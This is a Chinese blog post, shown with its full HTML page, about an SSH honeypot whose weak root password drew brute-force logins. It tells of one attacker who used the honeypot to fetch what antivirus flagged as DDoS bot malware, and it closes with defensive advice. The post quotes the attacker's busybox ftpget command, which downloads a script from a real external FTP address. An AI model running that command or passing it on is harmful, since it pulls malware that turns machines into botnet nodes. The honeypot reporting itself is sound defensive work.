<!doctype html>



  


<html class="theme-next mist use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="蜜罐,黑客," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="By:Pghook
0x00、背景一个苦逼的工程师，也就是我啦！接到了领导，一个”不靠谱”的任务，“蜜罐”，疯了！！和领导pk了好几次，想把这活给推了。奈何领导语言能力太突出，每次都败下阵来，只能做个安静的美男子，老老实实埋头折腾“蜜罐”了。
0x01、何为蜜罐“蜜罐”，何为”蜜罐”？往罐子里面倒点蜂蜜，然后这个罐子就成“蜜罐”了么？？神一般的逻辑（传说中的龙哥告诉我的），我要弄这样一个罐子向领导">
<meta property="og:type" content="article">
<meta property="og:title" content="一个‘米国’黑客的故事">
<meta property="og:url" content="http://www.pghook.com/2016/07/31/一个‘米国’黑客的故事/index.html">
<meta property="og:site_name" content="Portulaca grandiflora Hook">
<meta property="og:description" content="By:Pghook
0x00、背景一个苦逼的工程师，也就是我啦！接到了领导，一个”不靠谱”的任务，“蜜罐”，疯了！！和领导pk了好几次，想把这活给推了。奈何领导语言能力太突出，每次都败下阵来，只能做个安静的美男子，老老实实埋头折腾“蜜罐”了。
0x01、何为蜜罐“蜜罐”，何为”蜜罐”？往罐子里面倒点蜂蜜，然后这个罐子就成“蜜罐”了么？？神一般的逻辑（传说中的龙哥告诉我的），我要弄这样一个罐子向领导">
<meta property="og:image" content="http://7xn5a6.com1.z0.glb.clouddn.com/image/jpg1.png">
<meta property="og:image" content="http://7xn5a6.com1.z0.glb.clouddn.com/image/jpg2.png">
<meta property="og:image" content="http://7xn5a6.com1.z0.glb.clouddn.com/image/jpg3.png">
<meta property="og:image" content="http://7xn5a6.com1.z0.glb.clouddn.com/image/jpg4.png">
<meta property="og:image" content="http://7xn5a6.com1.z0.glb.clouddn.com/image/jpg5.png">
<meta property="og:image" content="http://7xn5a6.com1.z0.glb.clouddn.com/image/jpg6.png">
<meta property="og:image" content="http://7xn5a6.com1.z0.glb.clouddn.com/image/jpg7.png">
<meta property="og:image" content="http://7xn5a6.com1.z0.glb.clouddn.com/image/jpg8.png">
<meta property="og:updated_time" content="2016-07-30T16:54:09.552Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="一个‘米国’黑客的故事">
<meta name="twitter:description" content="By:Pghook
0x00、背景一个苦逼的工程师，也就是我啦！接到了领导，一个”不靠谱”的任务，“蜜罐”，疯了！！和领导pk了好几次，想把这活给推了。奈何领导语言能力太突出，每次都败下阵来，只能做个安静的美男子，老老实实埋头折腾“蜜罐”了。
0x01、何为蜜罐“蜜罐”，何为”蜜罐”？往罐子里面倒点蜂蜜，然后这个罐子就成“蜜罐”了么？？神一般的逻辑（传说中的龙哥告诉我的），我要弄这样一个罐子向领导">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="http://www.pghook.com/2016/07/31/一个‘米国’黑客的故事/"/>

  <title> 一个‘米国’黑客的故事 | Portulaca grandiflora Hook </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  



  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?d55ea5ac3caeb436321dc09c855fa047";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>








  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Portulaca grandiflora Hook</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                一个‘米国’黑客的故事
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-07-31T00:13:24+08:00" content="2016-07-31">
              2016-07-31
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/蜜罐/" itemprop="url" rel="index">
                    <span itemprop="name">蜜罐</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2016/07/31/一个‘米国’黑客的故事/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2016/07/31/一个‘米国’黑客的故事/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>By:Pghook</p>
<h2 id="0x00、背景">0x00、背景</h2><p>一个苦逼的工程师，也就是我啦！接到了领导，一个”不靠谱”的任务，“蜜罐”，疯了！！和领导pk了好几次，想把这活给推了。奈何领导语言能力太突出，每次都败下阵来，只能做个安静的美男子，老老实实埋头折腾“蜜罐”了。</p>
<h2 id="0x01、何为蜜罐">0x01、何为蜜罐</h2><p>“蜜罐”，何为”蜜罐”？往罐子里面倒点蜂蜜，然后这个罐子就成“蜜罐”了么？？神一般的逻辑（传说中的龙哥告诉我的），我要弄这样一个罐子向领导交差，呵呵！不扯淡了。<a id="more"></a></p>
<p><table><tr><td bgcolor="#FFFF00">蜜罐好比是情报收集系统。蜜罐好像是故意让人攻击的目标，引诱黑客前来攻击。所以攻击者入侵后，你就可以知道他是如何得逞的，随时了解针对服务器发动的最新的攻击和漏洞。（百度百科定义的，不是我说的。）</td></tr></table></p>
<h2 id="0x02、27号到29号">0x02、27号到29号</h2><p>我部署的是一个ssh的蜜罐，27号跑起来的，通过ADSL线路接入外网（也就是蜜罐机器的22号端口映射出去了）。到今天29号，已经发现有39个ip过来瞎搞了，25个ip成功爆破，总爆破次数1820次。</p>
<p><table><tr><td bgcolor="#FFFF00">（可见把22这种端口开放在外网的管理员是多么的牛逼，不知道这种勇气是哪里来的）。</td></tr></table></p>
<p>说明：蜜罐的口令是root:123456</p>
<p><img src="http://7xn5a6.com1.z0.glb.clouddn.com/image/jpg1.png" alt="img"></p>
<p><img src="http://7xn5a6.com1.z0.glb.clouddn.com/image/jpg2.png" alt="img"></p>
<h2 id="0x03、一个“米国”DDOS黑客的故事">0x03、一个“米国”DDOS黑客的故事</h2><p>这两天，每天上班来的第二件事，就是看这个蜜罐上的数据。今天看到了一个ip很有意思，他的详细操作记录如下：</p>
<p><img src="http://7xn5a6.com1.z0.glb.clouddn.com/image/jpg3.png" alt="img"> 时间从29号0点13到1点58，查了下这个ip，发现是“米国”的。上图右边的Input是‘米国’黑客的操作记录，估计他是够郁闷的（明明拿到root权限，但为啥很多命令执行不成功，这是哪门子的linux啊？），因为这个蜜罐支持的命令有限（蜜罐也是有点坑）。</p>
<p><img src="http://7xn5a6.com1.z0.glb.clouddn.com/image/jpg4.png" alt="img"></p>
<p>我其实很好奇这个黑客下载的是个啥玩意，他输入了一条命令如下：</p>
<p>busybox ftpget -u anonymous -p anonymous192.187.97.196 bin2.sh bin2.sh</p>
<p>我便顺藤摸瓜，也登陆到这台ftp服务器上去看了看，如下图：</p>
<p><img src="http://7xn5a6.com1.z0.glb.clouddn.com/image/jpg5.png" alt="img"></p>
<p>把这几个文件都弄下来了，看看里面到底是些啥玩意，bin2.sh文件内容如下：</p>
<p><img src="http://7xn5a6.com1.z0.glb.clouddn.com/image/jpg6.png" alt="img"></p>
<p>当用文本编辑器打开11这个文件的时候（这可是危险的操作，不能随便打开来历不明的文件啊！），出现如下情况：</p>
<p><img src="http://7xn5a6.com1.z0.glb.clouddn.com/image/jpg7.png" alt="img"></p>
<p><table><tr><td bgcolor="#FFFF00">“检测到‘病毒/间谍软件’linux/DDoS-BI，并已将它移至隔离区”。</td></tr></table></p>
<p>顿时就明白他是咋回事。原来这个米国黑客，想把这个机器用来做DDOS攻击时的肉鸡。</p>
<h2 id="0x04、总结">0x04、总结</h2><p><strong>第一、  </strong>黑客攻击无处不在，少年，惹不起咱就躲起来吧！！尽量少的暴露于互联网，尽量的对端口及应用管理后台做访问控制。</p>
<p><strong>第二、  </strong>加强口令，如下是这两天黑客爆破所使用密码的Top 10（等蜜罐放得时间长一些这个数据会更好看），尽量避免这些弱智口令吧。</p>
<p><img src="http://7xn5a6.com1.z0.glb.clouddn.com/image/jpg8.png" alt="img"></p>
<font color="#FF0000">说明：文章写于29号晚上，直到刚刚才把docx转成md格式，真是郁闷，求好用的markdown编辑器，写个故事我容易么？<br></font>


      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/蜜罐/" rel="tag">#蜜罐</a>
          
            <a href="/tags/黑客/" rel="tag">#黑客</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/01/18/python操作mysql数据库（编码问题）/" rel="next" title="python操作mysql数据库（编码问题）">
                <i class="fa fa-chevron-left"></i> python操作mysql数据库（编码问题）
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2016/07/31/一个‘米国’黑客的故事/"
           data-title="一个‘米国’黑客的故事" data-url="http://www.pghook.com/2016/07/31/一个‘米国’黑客的故事/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="http://7xn5a6.com1.z0.glb.clouddn.com/e.png"
               alt="PgHook" />
          <p class="site-author-name" itemprop="name">PgHook</p>
          <p class="site-description motion-element" itemprop="description">热爱生活、相信未来</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">4</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">标签</span>
              
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.exploit-db.com/" title="Exploit-db" target="_blank">Exploit-db</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.wooyun.org/" title="Wooyun" target="_blank">Wooyun</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.oshadan.com/" title="Oshadan" target="_blank">Oshadan</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://nosec.org" title="Nosec" target="_blank">Nosec</a>
                </li>
              
            </ul>
          </div>
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00、背景"><span class="nav-number">1.</span> <span class="nav-text">0x00、背景</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01、何为蜜罐"><span class="nav-number">2.</span> <span class="nav-text">0x01、何为蜜罐</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02、27号到29号"><span class="nav-number">3.</span> <span class="nav-text">0x02、27号到29号</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03、一个“米国”DDOS黑客的故事"><span class="nav-number">4.</span> <span class="nav-text">0x03、一个“米国”DDOS黑客的故事</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04、总结"><span class="nav-number">5.</span> <span class="nav-text">0x04、总结</span></a></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2015 - 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">PgHook</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"pghook"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
    <script src="/vendors/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
    <script src="/js/src/hook-duoshuo.js"></script>
  






  
  

  

  

  

</body>
</html>
